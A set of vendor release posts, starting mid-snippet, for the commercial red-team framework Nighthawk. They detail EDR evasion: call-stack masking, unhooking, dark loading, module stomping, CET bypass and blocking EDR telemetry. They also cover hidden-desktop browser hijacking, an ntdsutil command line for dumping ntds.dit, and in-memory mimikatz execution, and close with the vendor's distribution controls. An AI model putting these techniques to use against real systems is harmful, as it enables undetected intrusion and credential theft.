    # the only parameter is the file path
    path = params[0]

    # get an instance of the packer class
    packer = Packer()
    # add the path as a wide string
    packer.addwstr(path)
    # get the packed arguments
    packed_params = packer.getbuffer()
    
    # schedule the execution of the BOF
    message_id = nighthawk.execute_bof(f"bin/cacls.{info.Agent.ProcessArch}.o", "go", packed_params, True, False, 0)

    # simply return the message_id returned by 'execute_bof'
    return message_id

# register the new 'cacls' command
nighthawk.register_command(cacls_function, "cacls", "List user permissions for the specified file, wildcards supported", "Lists file permissions", """cacls <file path>

    Key:
        F: Full access
        R: Read & Execute access
        C: Read, Write, Execute, Delete
        W: Write access""","cacls C:\\windows\\system32\\cmd.exe" )

The scripts can then be imported to Nighthawk using the Python Modules feature. We’ve provided a thorough example using Fortra’s Nanodump:

When the script is imported, it then introduces the nanodump command to Nighthawk:

We hope this feature will allow users to better extend and instrument Nighthawk from the client.

CET Support

Control-flow Enforcement Technology (CET) is a feature found in modern processors that offers protection against control flow hijacking attacks. To implement this, a secondary stack or “shadow stack” is allocated from memory that is not directly tamperable. CET is significantly growing in prevalence and where hardware support is available, is enabled by default in modern Windows 10 and 11.

Shadow stack has implications for several popular OpSec features used by implants, but almost certainly breaks most if not all publicly known sleep obfuscation techniques. The consequence of which means you may be limited in the processes where you can beacon from, popular targets such as msedge.exe or chrome.exe being protected by CET mitigations.

In this release of Nighthawk, we rearchitected several features of the beacon to ensure they did not trigger a CET exceptions, bypassing shadow stack protection and making beaconing great again.

Miscellaneous Improvements

In addition to the above, we made a number of miscellaneous improvements to Nighthawk and the other supporting tools, including:

• Added a new, unpublished and private technique for cross process injection using function pointer hijacking,
• Improvements to Hidden Desktop to incorporate Windows 11 changes,
• Improvements to Hidden Desktop to evade common detection points,
• Added support for Cobalt Strike BOF key/value API,
• A large rewrite of our execute-exe harness, improving OpSec and increasing support for other varieties of PE, including Rust binaries,
• A number of improvements to NHLoader and the Nighthawk injectors to add support for disabling CET in spawned processes,
• A complete rewrite of the PE infection mode for NHLoader to implement a more effective method PE infection for exe and DLL PE files,
• Addition of alternative more evasive options for patching AMSI and ETW.

Introduction

OpSec and evasion are two of the most important factors for red team success in modern day operations, and Nighthawk continues to lead the way in innovation on this front. However, they are not the only considerations that contribute to the overall success of an operation. The capability to streamline your workflow and extend red team tooling beyond the core beacon goes a long way in improving the efficiency and accuracy, adaptability, and collaboration of your team.

Nighthawk’s 0.3 release is probably the most significant and impactful change to the framework since its creation and almost no new beacon features or evasion strategies have been introduced. Users need not worry though, we have something exciting coming on that front…

Redesign

The key focus for this release was improving automation and operator quality of life, and to accommodate this it meant several significant architectural changes to the solution. This included a complete rewrite of the backend API server and partial but significant rewrite of the user interface.

With our 0.3 release we made several core changes to the overall product architecture, including:

• Redevelopment of the backend API server, moving from python to .NET core,
• Creation of new JSON web service APIs to expose all beacon management, alongside event registration,
• Repositioning of all c2 logic to the new API server,
• Transition of UI and API communications to web sockets,
• Creation of new modes for c2 and API server IPC, including HTTP/2 and shared sockets.
• The redesign brings a number of benefits to our users, particularly around automation and performance. To streamline interaction with our new JSON API, we also provide a number of c# helper interfaces, allowing new projects to be built with just a few lines of code.

These interfaces provide full programmatic management and interactivity with the beacon; for example in a handful of lines of c#, we can create a tool to schedule new beacon commands (in this case just a shell command) and real time stream console output back:

The APIs comes complete with documentation for Swagger and Redoc, with full examples of the underlying requests:

The possibilities of where you can take this are endless, but some ideas we’ve already started building out are:

• Notification bots for Slack and Mattermost,
• Bots to run post-ex tooling to automatically triage and if required, deploy persistence on endpoints following initial check-in,
• Bots to monitor virus total for hashes of any uploaded artifacts.

SOCKS Rewrite

Our 0.2 SOCKS implementation was SOCKS4a and a little clunky, which we recognised as one of the key user pain points. Therefore while implementing a new backend, we also took the opportunity to completely rewrite and update our SOCKS implementation. With Nighthawk 0.3, we now offer a new, lightning fast SOCKS5 implementation with both DNS and UDP support, as well as HTTP keep alive.

Below we can see we’re easily able to get downloads in excess of 2mb/s using a 100mb test file, downloaded over the Fastly CDN redirecting to AWS and accessed over Tailscale:

Improved User Interface

One of the other key changes we made with this release was stripping back the Nighthawk user interface. Thanks to the new JSON API, we were able to rewrite the operator UI to act as a simple, thin wrapper for rendering JSON responses over web sockets, void of any logic or heavy lifting. The primary benefit of this is the significant performance increase that it brings, greatly improving the overall look and feel of the product to operators.

While rewriting the UI, we also introduced several new key features, including a c2 mesh graph and a modifiable beacon command queue.

Resizable console and pivot graph windows, with moveable pivot nodes make the look and feel of the UI much slicker and responsive:

We also added a visual command queue to list what pending commands are there for each agent, with the option to trivially cancel them prior to execution if you’ve made a mistake:

NHLoader

In addition to improvements to the core command-and-control component of Nighthawk, we also introduced a number of new features and improvements to NHLoader, the Nighthawk PE generator. These included the following:

A new PE infection injection mode to process legitimate PE binaries and modify them to run arbitrary shellcode on execution. This of course offers a number of benefits, borrowing the feeling of legitimacy from the original artifact, which can assist in evading certain EDR’s PE repudiation and machine learning detections. A new DLL proxying mode to support proxying to the legitimate COM server while performing COM hijacking, helping maintain the stability and integrity of the hijacked process. All of this is wrapped up in to a nice offline, point and click GUI based application:

Stego Loader

The Stego staging tool was previously built in to the main Nighthawk UI but with the 0.3 release we’ve separated it off to an offline, standalone GUI based tool.

This release also came with several new improvements to the stego tool, including timer based execution intervals and alternate modes for steganography.

Wrapping up, Nighthawk 0.3 is a significant overhaul of the product and will enable a number of new and exciting improvements we have on our roadmap for opening up more control of the platform and the beacon to our users.

Over the next few weeks, we’ll be releasing a handful of video demos illustrating the power that the new API brings to our users, so stay tuned.

Introduction

See no evil, hear no evil, speak no evil. This Japanese maxim epitomises the EDRs coming up against our latest release of Nighthawk. Following copious amounts of research and development, we’re happy to release Nighthawk 0.2.6, and as is the status quo, including several new features unique to Nighthawk.

Call Stack Masking

Telemetry obtained from call stacks is proving to be a reliable and effective resource for defenders to detect malware. This is evidenced through Elastic’s (and other vendors) continued evolution in this space. More information on the direction of travel can be found in the following resources from Elastic:

• https://www.elastic.co/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks
• https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks

This kind of deep visibility provides the EDR with significant insight to call stacks and presents the opportunity to not only trace API call execution back to virtual memory (assuming module stomping is not enabled) but also to build signatures for anomalous stack captures. With many EDR vendors taking advantage of ETW Threat Intelligence, we expect more improvements in this space given the type of detailed telemetry available.

This kind of telemetry can’t be evaded by patching the process instrumentation callback, contrary to belief in some corners 🙂

A good example of this is given in the aforementioned Elastic blog post, which highlights how this type of visibility provides sufficient telemetry to fingerprint when direct system calls are executed from unbacked memory. While this can be somewhat hindered through indirect syscalls, which will mask the initial return address, the stack will ultimately be unwindable to unbacked memory.

While syscalls have been the “go to” for many red teams and c2 developers when attempting to evade EDR, the trivial means in which they can traced and the anomalous nature of syscall execution originating from outside of ntdll.dll and friends means that in some cases they may be considered to provide more detection points than evasion.

If we go back and consider why syscalls were leveraged in the first place, this was predominantly to evade user mode hooks. However, if we’re able to remove the hooks without triggering an alert within the EDR, then the requirement for syscalls becomes less apparent. Since the first version, Nighthawk has included a comprehensive unhooking strategy that facilitates configuration driven removal of user mode hooks. While this is under constant review and has evolved with each version of Nighthawk we have found it to be highly effective against every EDR we’ve tested it against (which is a lot but don’t claim it’s every one on the planet! 🙂). With that in mind, when unhooking is enabled, Windows API calls might be considered as equally opsec safe as syscalls. This however does not negate the detection through analysis of call stacks obtained through deep visibility in the kernel. Enter Nighthawk’s new API call stack masking feature.

Nighthawk 0.2.6 introduces the concept of API call stack masking. This feature can be enabled using the call-stack-masking profile configuration option. When enabled, Nighthawk will proxy all Windows API calls through its masking code. In this mode, full implant masking will be performed; that is, every Windows API call executed by Nighthawk will have its call stack spoofed to appear as though it unwinds to the imported API and beyond Nighthawk to other legitimate functions on the stack. That is, whenever a Windows API call is executed within Nighthawk, no unbacked memory will be present on the call stack when inspected by the kernel. The beauty of this feature is that it brings call stack spoofing to active use of the beacon, meaning that even on a sleep 0, Nighthawks call stacks and threads will remain masked.

Let’s take a look at this feature in action:

In the above video, we do the following:

• Enable Sealighter so that it is capturing ETW TI events,
• Inject Nighthawk shellcode in to notepad.exe so that the entire reflective loading process is captured by ETW TI
• Set our beacon to sleep 0 0 so it is continually checking in interactively
• Walk through the Sealighter event logs to understand the ETW TI events that are generated

What we see is that, and is demonstrated in the ETW TI traces and Process Hacker module mapping, that the API calls being made appear to be backed by legitimate DLLs on disk for the complete stack trace.

After this, we walk through the stacks of all the threads inside notepad and can visibly see that all threads stacks are completely backed by on disk DLLs, with no visible references to virtual memory, despite Nighthawk operating from it.

Make Living Off The Land Great Again

In November ‘22 we released Nighthawk 0.2.1; this version included the execute-exe post-exploitation command that allows local PE binaries to be read from the operator machine, transmitted over the command-and-control channel, and executed within a thread of the currently running beacon.

This release improves our execute-exe harness by extending it to support PE binaries that are hosted on the compromised machine, available with the execute-exe-local command. The benefit of this feature is that it evades EDR detections that are based around process creation events, as opposed to the behavioural actions being performed.

For example, imagine that you’ve a beacon running on a domain controller and you want to extract ntds.dit for offline password cracking. While there are a number of ways to achieve this, one possible technique might be to run ntdsutil.exe to create a dump of the directory. From our practical testing, we’ve noted that a number of EDRs will alert on this action, however the alerting is often based solely on process creation events (e.g. ntdsutil.exe being executed with specific arguments like 'ac i ntds' 'ifm' 'create full c:\\temp' q q). Courtesy of our improvements to execute-exe we’re able to map ntdsutil.exe in to the memory of our current beacon and avoid any process creation, but still achieve the same results.

In the above video, we show how running ntdsutil.exe from cmd.exe causes an alert in Microsoft Defender for Endpoint; this alert arises due to the process lineage. However, manually mapping the exe in to the memory of mspaint.exe and performing the same dump generates no alerts.

Module Stomping for PE and COFFs

In November ‘22 with our 0.2.1 release, we introduced the concept of .NET stomping, another first for c2s at the time. This feature would load a legitimate .NET assembly from the global assembly cache and stomp over it with an assembly provided by the operator during post-ex execution, meaning that the assembly provides the perception of being loaded from disk. This feature has been incredibly effective for evasion, so much so that we decided to introduce a similar feature to our execute-exe and execute-bof harnesses.

To enable this feature, we introduced the exec-module-stomp-enabled and exec-module-stomp-path-list profile configuration options that will allow a list of DLLs to be loaded for stomping during post-exploitation PE and COFF execution.

In this video, we see the execute-exe-local harness load ping.exe from the local system of the beacon, map it in to memory by stomping over the configured stomping module, in this case chakra.dll.

Snoop On to Them As They Snoop On To Us.

Another feature that was highly requested by our customers was the ability to monitor the user’s desktop. This can prove useful when you’re attempting to learn about how a user works on a day to day basis. In this release we therefore introduced the screen-watch command. When screen-watch is enabled, Nighthawk will periodically take screenshots of the users desktop, using a technique similar to how our Hidden Desktop feature works. The screenshots will downloaded in line with the configured sleep time and rendered in the user’s UI. This allows the operator to monitor the user’s screen in real time, as opposed to pre-record the screen and retrospectively view the actions after the fact.

Let’s take a look at this in action:

In the above video, we also see the power of Nighthawk’s masking feature, where threads doing lots of work courtesy of the screen-watch activity, appear to remain backed by disk even while the c2 is checking in interactively.

Nighthawk Loader

Another highly requested feature from our customers was the ability to create loaders. Prior to 0.2.6 and in addition to shellcode exports, Nighthawk would create DLL and EXE artifacts but these used simple shellcode loaders intended for testing your c2 connectivity. The expectation was that users would generally prefer to use their own custom loaders. However, following these requests, we’ve now added the option of using loaders generated by Nighthawk.

With our latest release, we introduce a new tool; NHLoader. NHLoader is a standalone GUI based tool that will take shellcode as an input, and generate DLL, EXE or service EXE artifacts. These artifacts are uniquely obfuscated and can optionally contain anti-debugging and guardrails to restrict execution.

The loader provides significant flexibility, allowing the operator to create artifacts that clone the resources from another legitimate artifact, including metadata, code signing certificates, icons and the import table. Arbitrary exports can also be added to DLLs, meaning no further time needs to be spent inside Visual Studio when creating loaders for DLL hijacks 🙂

The NHLoader is capable of creating artifacts that can perform both local thread and spawn based injection, leveraging indirect syscalls and unhooking where required.

Let’s take a look at the loader in action:

FireBlock

EDR killing tools are on the rise as adversaries recognise the challenges associated in performing tasks like credential dumping with the EDR enabled and reporting. Most of these tools rely on the abuse of vulnerable drivers to achieve this, which in many cases means loading your own driver. This of course brings its own challenges, with the telemetry associated in dropping and loading a driver, as well as the need to navigate Microsoft’s Vulnerable Driver Blocklist.

In this release of Nighthawk we’ve opted to include one of our internal tools that takes an alternative approach to neutering the EDR telemetry. FireBlock leverages the Windows Filtering Platform to prevent the EDR processes from egressing, and thus preventing it being able to report any alerts. At this point the operator has the freedom to operate without the concern of being detected.

FireBlock allows the operator to specify EDR processes to block on the command line, or alternatively allow FireBlock to automatically find them based on a list of over 600 known EDR process names. FireBlock can be executed through execute-exe meaning that no process creation events occur, and the actions will be performed from within a thread of your current beacon process.

Let’s take a look at FireBlock in action:

In the above demo, we first execute FireBlock in detect mode to identify which EDR products are running from it’s built-in list. Next, FireBlock applies a filtering rule to prevent Defender for Endpoint from communicating, and we execute mimikatz through our execute-exe PE harness. As can be seen in the Defender dashboard, while we expect alerts to be generated due to the direct LSASS access from mspaint, no alerts are sent through, giving the operator freedom to operate.

Nighthawk 0.2.6 will be available to customers this week.

Congratulations to our new king and in honour of the coronation, we proudly present Nighthawk 0.2.4.

Our last Nighthawk public post was for our 0.2.1 release in November and while several months have passed, we’ve continued to be busy in the background releasing new versions and features to customers, as well as beginning a separate and parallel development stream on a design re-architecture.

With our latest 0.2.4 minor release, we’ve decided to recap a little on some of the additions we’ve brought to Nighthawk.

Encrypting the CLR Garbage

One of the major new features included in our 0.2.4 release we’ve dubbed “OpSec CLR”. Nighthawk leverages the CLR in a number of areas, including in the Custom C2, custom agent traffic encoders and within our inproc-execute-assembly .NET assembly harness. These features have been around since the very first release of Nighthawk and they facilitate the execution of .NET assemblies in process for performing various tasks.

There are however some drawbacks to executing .NET assemblies in process. Firstly the CLR and its dependencies must be loaded in to your process; Nighthawk is able to evade the indicators associated with this by leveraging the dark loading capability we included in our 0.2.1 release. However, once the CLR is loaded it is somewhat difficult to completely unload without causing instability in the process, therefore most CLR harnesses will typically just destroy a custom app domain after execution. While this approach works nicely, it does often leave some artifacts relating to the assembly in the process, primarily because the CLR uses its own internal memory management and garbage collection routines. Unfortunately this meant that we were not able to take advantage Nighthawk’s custom and encrypted private heap, leaving some artifacts from the .NET assembly lingering in the memory of the process. Consequently, this meant that memory signatures could be built for detecting common assemblies in memory, or worse if the blue team performed a memory acquisition of your beacon process they would get greater insight in to some of the actions performed.

While assemblies could of course be obfuscated, we wanted to empower our customers by providing some built-in protections. Following extensive research, we discovered a somewhat supported means by which it was possible to implement your own private allocation routines within the CLR. As of 0.2.4 and as another first for Nighthawk in the implant space, Nighthawk now supports the possibility for .NET memory sleep encryption, using a custom allocator to protect and encrypt not only the executed .NET assembly but also any of its allocations during runtime. All allocations and modifications to page permissions take advantage of Nighthawk’s configuration strategy for syscall execution. In addition to this, when the assembly is passed to Nighthawk, the assembly metadata will be parsed and mangled before execution to further limit the risks of memory scanning.

In the video below, we show memory analysis of two beacons both executing Seatbelt, one with the CLR sleep encryption enabled and the other without:

Extra Life

A key design consideration in beacon development is the “in-process” vs “fork and run” model. With a fork and run model, you can afford to give much less consideration to the stability of your post-exploitation tooling because they will execute inside a surrogate process that exits on completion. This however comes at the price of OpSec, with the process of spawning a new surrogate, injecting in to it and capturing the output creating many points for detection.

However, when operating in a in-process architecture, null and invalid pointers, unhandled exceptions, executing unmapped memory and other subtle bugs in post-exploitation tooling can lead to instability in the beacon process. Nighthawk offers a number of harnesses to execute post-exploitation tooling in-process, including PEs (execute-exe), .NET assemblies (inproc-execute-assembly) and BOFs (execute-bof) and while we’ve attempted to implement rigid exception handling in each of the harnesses, it is difficult to ensure this is all encompassing.

With the 0.2.4 release we’ve now included a feature we’ve dubbed “extra life” in hommage to the awesome new Super Mario Bros film. When extra life is enabled, Nighthawk will deploy a hook to the exception dispatcher and a custom exception handler to unwind any threads in the process. Should an unhandled exception occur that would normally result in unexpected behaviour and potentially process instability, Nighthawk will attempt to catch the exception and revive the beacon by reloading a copy of itself in-process. This feature brings significant confidence to the in-process model, in particular when executing an array of different post-exploitation tooling.

Extra life is available by configuring the extra-life configuration option, which supports three different options, inprocess, spawn or inject, which will load Nighthawk in the current process, by spawn injecting or via cross process injection.

Let’s take a look at extra life in action when touching invalid memory using a “bad” PE with our execute-exe harness:

Reverse Port Forward

In our 0.2.2 release we added one of the features most requested by our customers, a reverse port forward. This post-exploitation features allows traffic routed from the beacon network to be sent over the c2 channel and out of the teamserver to an arbitrary location. Although it can be helpful for many things, this feature is particularly useful in authentication coercion attacks which are becoming ever popular (we did a Twitter thread about some of these recently:

Exploitation of classic SMB relaying with Nighthawk therefore might look something like this:

To start a reverse port forwarding session, Nighthawk now supports the rportfwd-start which takes the bind interface, port and forward host/port as arguments. Let’s take a look at this in practice:

Hidden Desktop Improvements

In November’s 0.2.1 release we introduced the Hidden Desktop, a post-exploitation feature that allows you to create a virtual desktop on the user’s endpoint and interact with thick client applications while remaining invisible to the user. This feature has been a game changer for many of our users as it allows them to take advantage of the user context to interact with thick client applications. There are however some considerations when using the hidden desktop, including the use of browser applications. Due to how many browsers broker their processes, opening a new instance of the browser could inadvertently lead to a tab being spawned on the real user’s desktop if they had the browser open. This is clearly less than ideal, as such with 0.2.2 we introduced a new configuration option to hidden desktop, alongside a new custom start menu painted by Nighthawk. The custom start menu contains start items for spawning a variety of browsers which when clicked, would lead to the user’s browser context being cloned on disk and the cloned profile being used by the hidden desktop browser. This now provides the benefits of leveraging the real user context, including session cookies and saved credentials, for browsing. In addition to this, we also made some minor improvements to the hidden desktop, including support for non-standard taskbar locations.

In the video below, we use the hidden desktop to access Chrome as the user which remains invisible to them:

Token Querying

Another feature that was frequently requested by our customers was the ability to retrieve some basic information about a token. That is, if a token has been stolen and retained in the Nighthawk token store using the steal-token command, it may be valuable to find out more information about the token such as the domain and user it belongs to or when the token expires. In the 0.2.2 release we added a new query-token command that will retrieve information about a token based on its handle, an example of this is shown below:

Shared Credential Store

Another highly requested feature was the ability to save credentials captured during the op inside a store shared by all operators. In our 0.2.2 release we added the credential store to the Nighthawk UI. This store allows operators to manually add any credentials they discover such that they are recorded and accessible to all users in the operation. It also allows notes to be manually added to the credentials so additional context can be stored alongside the credentials:

Profile Linter Nighthawk is highly configurable, with a plethora of options available to the user to change the beacons behaviour or the c2 traffic. As such, the JSON configuration used by the beacon can be quite complex and error prone. In our 0.2.2 release we added a linter for the profile format to the supporting tools repository, allowing operators to validate profiles and c2 traffic match the expected format before deploying them.

Miscellaneous Minor Improvements

In addition to various bug fixes across the beacon, UI and API, several other minor improvements were introduced across these versions, including:

• Added support for the X-Forwarded-For header to report external IP,
• Added support for Cobalt Strike’s BOF download API,
• Improvements to our syscall unhooking in both syswow64 and x64 processes,
• Upgraded notes and colouring inside UI to be shared across all operators

This Halloween week brings our third and final Nighthawk release for the year and its packed with exciting new features, backed by MDSec’s world class research and development team. Indeed, there are so many new features that move the needle, this release could easily have been a major release. However, as it will be our last release in the current architecture (watch this space! :coolbemused:) we decided to issue it as a minor version. But let that take nothing away from the exciting new features it includes, many of which are first time to any public framework. Without further ado, let’s dive in to what’s new.

Stego Stager

To date, Nighthawk has always been stageless; that is, the artifacts exported from the framework contained a full copy of the beacon. While we did introduce the concept of keying in 0.2, this release takes things one step further by offering a stager. The stager can be useful in a number of scenarios, and particularly when performing initial access or persistence as it allows the operator to send only a small portion of shellcode to the user without the risk of immediately exposing the full beacon.

0.2.1 provides a new payload generator within the UI, allowing the operator to export ~20kb of customisable shellcode that will retrieve an image over HTTP(S) and extract the Nighthawk stageless shellcode from it, then load it in process. Not only this, the stego stager also offers all the benefits of Nighthawk’s opsec, including the use of indirect syscalls, unhooking and other evasive features:

For input, the payload generator will accept any shellcode and lossless image format, using steganography to hide the shellcode inside the modified image.

When combined with Nighthawk’s other payload generation features, such as keying, it allows the full execution chain to offer a high degree of protection for the beacon artifacts; a methodology for execution may look as follows:

To illustrate the stager, the following video shows creation of 24kb of shellcode that performs a variety of OpSec magic, it then retrieves a PNG image via HTTP that Nighthawk has created and uses steganography to extract the shellcode and load it in process:

Dark Load Library In June 2021 we released a blog post on “Bypassing Image Load Kernel Callbacks” with a companion proof of concept tool called “Dark Load Library” from our colleague @batsec. This research illustrated how manual mapping could be used to bypass telemetry associated with image load events. Conceptually, this technique is powerful as it can assist in avoiding signatures backed by these indicators which have plagued other frameworks as we illustrated in other research.

For example, to detect the use of mimikatz in an environment a threat hunter might simply hunt for all image load events that occurred within a short period of time and matched a signature of dlls loaded by the tool such as vaultcli.dll, cryptdll.dll and samlib.dll. See this example provided by Splunk for more practical detections. Other examples might include anomalous loading of the CLR and associated DLLs being used to hunt for .NET post exploitation activities.

Nighthawk 0.2.1 brings the integration of a fully weaponised implementation of Dark Loading, allowing all Nighthawk dependencies to be manually mapped in to memory of the host process. These DLLs can then held in an encrypted state at rest and removed from the PEB and other sources used by the loader such hashlinks. The Nighthawk dark loader is available not only for all Nighthawk threads, but also process wide if required. Consequently, this means Nighthawk is able to dark load all DLL dependencies used by post-exploitation tooling, including the inproc-execute-assembly CLR harness and the execute-exe PE harness. That is, running any .NET assembly or any PE binary in a unique thread inside the beaconing process will not trigger any image load events, nor will the DLL be immediately visible by tools that attempt to list the modules of a process.

Let’s take a look at this in action:

In this video, we see Nighthawk injected in to a remote process and then subsequently used to execute a .NET assembly in a thread of that process. While monitoring the process for image load events using procmon and Sysmon, we see no image load events (ID 7), we also see Nighthawk manually map the DLL dependencies to the process, monitoring this in Process Hacker we see they are linked in the PEB then subsequently unlinked where they are held in encrypted in virtual memory on sleep.

Hidden Desktop

Sometimes during a red team engagement, the operator may find themselves needing to run a thick client application from within the environment to achieve their operation objectives. Common examples include database clients, financial applications or MFA soft token software. Typically, this software is accessed using SOCKs proxy to remote desktop, or over an injected remote VNC channel. Both of these approaches have various drawbacks, with the injected reverse VNC channel being often signature rich and has the limitation that the real user can witness any changes to the desktop.

With this release Nighthawk brings a fully interactive, hidden desktop. This implementation does not use any VNC like protocol, and instead relies on a completely custom implementation of a virtual desktop built using legitimate Windows APIs that are frequently used by legitimate software such as Chrome. The Nighthawk implementation will take screenshots of the virtual desktop and adjust them inline with the operator’s desired image quality, extracting them over the c2 channel and aligning to the sleep time and using configurable chunk sizes. Keystrokes and mouse movements are then translated from the operator’s view, to the hidden desktop, allowing the operator to fully control thick client applications on the virtual desktop. All interaction on the hidden desktop is completely transparent to the user; applications will not be visible on the taskbar nor will GUI applications appear in view.

A video demonstration of the hidden desktop can be seen below:

As can be seen in the video, we’re able to open desktop applications such as Chrome (inheriting the user’s cookies), command prompt, file explorers etc and this remains transparent to the user using the desktop.

Execute-Exe

Nighthawk has provided a safe environment for executing both the CLR and COFF binaries in our .NET and BOF harnesses since release. However, this does not account for all possible tool formats that the operator might want to run. This release brings a custom PE loader to Nighthawk, allowing the operator to execute most PE binaries on the remote host, in-process and within its own thread. Furthermore, any PEs executed using the execute-exe command will also benefit from the OpSec configuration of Nighthawk’s Dark Load Library, meaning that any dependencies used by the PE will be manually mapped and hidden in memory.

The execute-exe PE loader can be used to run the majority of your favourite tools such as mimikatz, the Sysinternals suite or make living off the land great again by running native Windows binaries without any process creation events. The binaries are read from the operator’s machine, communicated over the c2 channel and executed in-process, never touching disk; once execution is complete the PE is wiped from memory. Not only this, but the PE loader supports GUI based applications providing they’re sufficiently portable, allowing them to be executed on the hidden desktop without being seen by the user.

Let’s take a look at Execute-Exe in action:

In this video, we demonstrate running mimikatz.exe from the operator’s machine, being transferred over the c2 channel and run in a thread inside notepad.exe. When combined with our dark loading capabilities, there are no image load or process creation events and the exe is removed from memory following execution.

In the second part of the video, we show a Nighthawk beacon running on a hidden desktop session inside chrome.exe; the video shows how we are able to load even GUI based applications (assume portable) from the operators machine, in the chrome.exe beacon process, and controllable from the hidden desktop. These remain invisible to the user and also benefit from the dark loading capabilities.

.NET Stomping

The use of .NET for post-exploitation has grown significantly over the past few years, with many of a red teamer’s favourite tools being developed in the language. This of course led to increased focus on .NET tradecraft from defenders. While we won’t dive in to how these detection opportunities are frequently implemented (we hope this will follow in a future post!), it is sufficient to say that many EDR products have the capability to accurately detect .NET post-exploitation outside of the traditional EtW based detections by monitoring for floating modules being loaded.

To provide continued evasion against such detections, this release of Nighthawk now offers the ability to perform module stomping of .NET assemblies for both our in-process CLR harness, and our custom c2 channels. When using .NET stomping, Nighthawk will load a legitimate module from the global assembly cache and overwrite it with the contents of the assembly provided by the operator. The on-disk module will remain with its legitimate metadata in the PEB and will otherwise appear as though it’s been legitimately loaded by the process with the exception that the assembly that has been executed is that of the operator. Indeed, even when executing an assembly that uses reflection to display its codebase through “Assembly.GetExecutingAssembly().CodeBase;”, it is shown to reference the on-disk module. This feature provides a powerful and effective means of blending .NET tradecraft and can be used in conjunction with Dark Load Library to hide the image load events associated with the CLR and avoid the modules being listed in the PEB.

Let’s take a look at what happens when we run an assembly that’s been module stomped:

In this final video, we show an injected beacon inside notepad, running a .NET assembly in process. The .NET assembly is run in place of a loaded System.Web.Mobile.dll from the global assembly cache. The .NET assembly uses reflection to execute “Assembly.GetExecutingAssembly().CodeBase;” which shows the location of the assembly module on disk.

Miscellaneous

In addition to the above big ticket features, a number of other further enhancements were made that bring additional improvements to Nighthawk, including but not limited to:

• Support for arbitrary indirect syscall execution and return address spoofing: Previously, Nighthawk supported indirect syscall execution by proxying calls through NTDLL. This release however passes control of the DLL to be proxied over to the operator through an array of substrings. This feature provides evasion for certain EDRs that expect syscall execution to originate from a specific DLL.
• Improved SOCKS support: The 0.2.1 release now includes a completely rewritten socks4a server. This includes a number of enhancements such as multi operator support through the teamserver and increased speed and performance.
• PEB spoofing for module stomping: Nighthawk has always provided a module stomping feature since release. This feature has however been enhanced with this release, allowing the operator to spoof the module name used for the backing module in the PEB. This feature provides additional evasion to EDR detections that expect certain events to occur from specific modules.

Nighthawk 0.2.1 will be made available for customer download this week, please watch out for announcements.

Hacky Halloween all! – @MDSecLabs

Recently, Proofpoint released a blog post entitled “Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice”. In this post, Proofpoint outlined a campaign used by a legitimate red team customer of Nighthawk and go on to describe some of the functionality available in our May ‘22 release, obtained through reverse engineering. It also makes unsubstantiated and speculative projections that Nighthawk could be abused by threat actors in the future. This subsequently led to various questions over both Twitter and e-mail about what precautions we take when distributing Nighthawk. In this post, we’ll address some of these questions.

Firstly though, we would like to note that Proofpoint did not approach us in advance of release of their post nor ask us to confirm whether or not the activity was indeed legitimate. Instead, they irresponsibly documented Nighthawk’s use of a number of unpublished EDR bypass techniques which will no doubt now come to the attention of bad actors looking to level up their own frameworks.

Having previously been used as the in-house c2 by the MDSec red team, we made the decision to commercialise Nighthawk in 2021; a decision that was not taken lightly. However, in order to justify the continued research and development effort and support an ever growing development team, as well as fund the future roadmap of innovations we had planned, strategies to monetise the c2 needed to be sought.

Having witnessed years of actors abusing other frameworks, we were starkly aware of the risks of developing and distributing commercial intrusion software. As such, we devised a number of procedural and technical controls to minimise our exposure to the software falling in to the wrong hands.

Nighthawk is considered “Military and dual-use goods” by the UK government and as such its use is export controlled. Specifically, Nighthawk falls under the 4D004 category of “intrusion software”:

“4D Software 4D004 “Software” specially designed or modified for the generation, command and control, or delivery of “intrusion software”.”

As such, an export license is required in order to export the software outside of the UK. Prior to commercialising Nighthawk and following vetting by the Department of International Trade, MDSec was granted several Open General Licenses (OGL and GEA) to facilitate distribution across EU member states, Australia, Canada, Japan, New Zealand, Norway, Switzerland (including Liechtenstein) and the United States. While it is possible to apply for individual licenses (SIELs) to export to companies in other countries, at the time we made the conscious decision that we would not do so and to date have outright rejected any enquires that deviate from the countries where existing licenses allow us to export to. Indeed, MDSec has rejected many more approaches to purchase the software than we have accepted for this reason.

That of course does not preclude bad actors setting up shell companies and attempting to buy the software or attempting to use resellers in these countries and we are abundantly aware of this as a potential “bypass”. As such, for every Nighthawk enquiry we obtain details about the registered company, end user locations, ultimate beneficial owner and ask for documentation around their intended use cases. With these details we proceed to vet each company to ensure that they are not only legitimate, but that they are indeed likely to use the software for lawful red team operations.

Nighthawk has a minimum three seat license requirement, as such we do not sell to individuals, contractors or small single operator red teams. Despite being publicly lambasted for this decision over social media in the past, we considered this part of our responsible distribution policy and has made our job of vetting purchase enquiries much easier as, for the most part, the price point and seat requirements put the product in the realm of consideration for only serious and established red teams; coincidentally those who we are most interested in doing business with.

Many of the enquiries we receive about Nighthawk request a trial of the product prior to purchasing. As seen with Cobalt Strike and other products in the past, self hosted trial licenses are one of the most likely ways a product will be exposed. As such, MDSec do not offer self hosted trials of Nighthawk. Instead, on the rare occasions that the vetted prospective customers insist on a hands-on evaluation of the product in advance of purchase, we offer them access to an isolated MDSec hosted lab environment containing the product where a number of technical controls have been put in place to limit both accidental and intentional exposure of the product. Prior to access to this environment, MDSec request that the prospective customer sign a mutual non-disclosure agreement and agree to several conditions that prohibit the product or its artifacts been extracted from the lab or reverse engineered within it.

For the majority of prospects, MDSec provide an online two hour virtual demonstration of the product to potential customers which provides us with the opportunity to (virtually) meet them, further reducing the likelihood of bad actors anonymous purchasing the product.

Once the vetting process is complete and the purchase is agreed, access to the product and its updates is distributed via user accounts on a multi-factor authentication protected portal. We explicitly do not provide downloads through API key or simple online forms where the download cannot be attributed to an individual. While we acknowledge that this approach does create additional inconvenience for the customer, our belief is that it does provide additional confidence that the downloader is who we expect and that an API key hasn’t been accidentally leaked or shared.

